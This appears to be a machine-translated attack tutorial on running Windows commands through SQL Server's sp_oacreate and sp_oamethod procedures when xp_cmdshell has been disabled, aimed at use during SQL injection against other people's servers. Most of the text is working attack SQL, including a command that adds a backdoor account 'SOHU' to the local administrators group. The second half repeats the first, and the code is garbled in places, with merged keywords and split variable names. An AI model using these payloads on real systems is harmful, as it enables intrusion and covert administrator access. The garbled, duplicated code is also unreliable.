The most interested interest may be a console command to run the operating system using the extended stored procedure xp_cmdshell. This method is also very simple, just use the following SQL statement:
EXEC MASTER.DBO.XP_CMDSHELL 'DIR C: /'
But more and more database administrators have realized potential dangers of this expansion stored procedure, they may delete or change the dynamic link library XPLog70.dll file of the stored procedure, and many people may give up. Because we can't run any CMD commands, it is difficult to view the files, directories, and open services of the other party, and cannot add NT users.
I have studied this, and later I found that even if xp_cmdshell is not available, it is possible to run the CMD on the server and get the result of the result. Here you need to use several system stored procedures for SQL servers: sp_oacreate, sp_oAgetProperty and SP_OAMETHOD. The premise is Wscript.Shell and scripting.FileSystemObject on the server available. Sp_oacreate creates an OLE object instance on the Microsoft® SQL ServerTM instance. Syntax sp_oacreate progid, | clsid, objectToken Output [, context] sp_oagetProperty Gets the properties value of the OLE object. Syntax sp_oagetproperty ObjectToken, PropertyName [, PropertyValue Output] [, index ...] sp_oamethod Call the OLE object. Syntax sp_oamethod ObjectToken, MethodName [, ReturnValue Output] [, [@ParameterName =] Parameter [output] [... n]]]]
Idea: First create a WScript.Shell on SQL Server, call its Run Method, output the result of cmd.exe to a file, then build a scripting.filesystemObject, build a TextStream object, read the temporary file The characters in, and a row is added to a temporary table. The following are the appropriate SQL statements CREATE TABLE mytmp (info VARCHAR (400), ID IDENTITY (1, 1) NOT NULL) DECLARE @shell INTDECLARE @fso INTDECLARE @file INTDECLARE @isEnd BITDECLARE @out VARCHAR (400) EXEC sp_oacreate 'wscript. Shell ', @ shell outputexec sp_oamethod @ shell,' run ', null,' cmd.exe / c Dir C: /> C: /TEMP.TXT ',' 0 ',' TRUE '- Note Run's parameter TRUE This parameter must be used for the result of the wait for the run, and this parameter must be used for a long time command similar to PING. EXEC sp_oacreate 'scripting.filesystemobject', @ fso outputEXEC sp_oamethod @ fso, 'opentextfile', @ file out, 'c: /temp.txt' - because of fso OpenTextFile method returns a textstream objects, so in this case it is @file an object token WHILE @shell> 0BEGINEXEC sp_oamethod @ file, 'Readline', @ out outINSERT INTO mYTMP (info) VALUES (@out) EXEC sp_oagetproperty @ file, 'AtEndOfStream', @ isEnd outIF @ isEnd = 1 BREAKELSE CONTINUEENDDROP TABLE mYTMP Note: If you use this method when you use this method while injecting the test, you must have a row, and each statement is separated by space. Let me give you an idea of it: declare @shell int exec sp_oacreate 'wscript.shell', @ shell output exec sp_oamethod @ shell, 'run', null, 'c: /winnt/system32/cmd.exe / c net localgroup administrators SOHU / Add '-
First create a WScript.Shell on SQL Server, call its Run Method, output the result of cmd.exe execute into a file, then build a scripting.filesystemObject, build a TextStream object, read the temporary file Character, one row added to a temporary table.
The following is the corresponding SQL statement
CREATE TABLE mytmp (info VARCHAR (400), ID IDENTITY (1, 1) NOT NULL) DECLARE @shell INTDECLARE @fso INTDECLARE @file INTDECLARE @isEnd BITDECLARE @out VARCHAR (400) EXEC sp_oacreate 'wscript.shell', @ shell outputEXEC Sp_oamethod @ shell, 'run', null, 'cmd.exe / c Dir C: /> C: /TEMP.TXT', '0', 'TRUE' - Note that the parameter of Run TRUE refers to the latency operation The result is required to use this parameter for long-term commands similar to PING. EXEC sp_oacreate 'scripting.filesystemobject', @ fso outputEXEC sp_oamethod @ fso, 'opentextfile', @ file out, 'c: /temp.txt' - because of fso OpenTextFile method returns a textstream objects, so in this case it is @file An object token
WHILE @shell> 0BEGINEXEC sp_oamethod @ file, 'Readline', @ out outINSERT INTO MYTMP (info) VALUES (@out) EXEC sp_oagetproperty @ file, 'AtEndOfStream', @ isEnd outIF @ isEnd = 1 BREAKELSE CONTINUEENDDROP TABLE MYTMP
Note: If you use this method when you use this method while injecting the test, you must have a row, and each statement is separated by space.
Let me give you a thinking:
declare @shell int exec sp_oacreate 'wscript.shell', @ shell output exec sp_oamethod @ shell, 'run', null, 'c: /winnt/system32/cmd.exe / c net localgroup administrators sohu / add' -
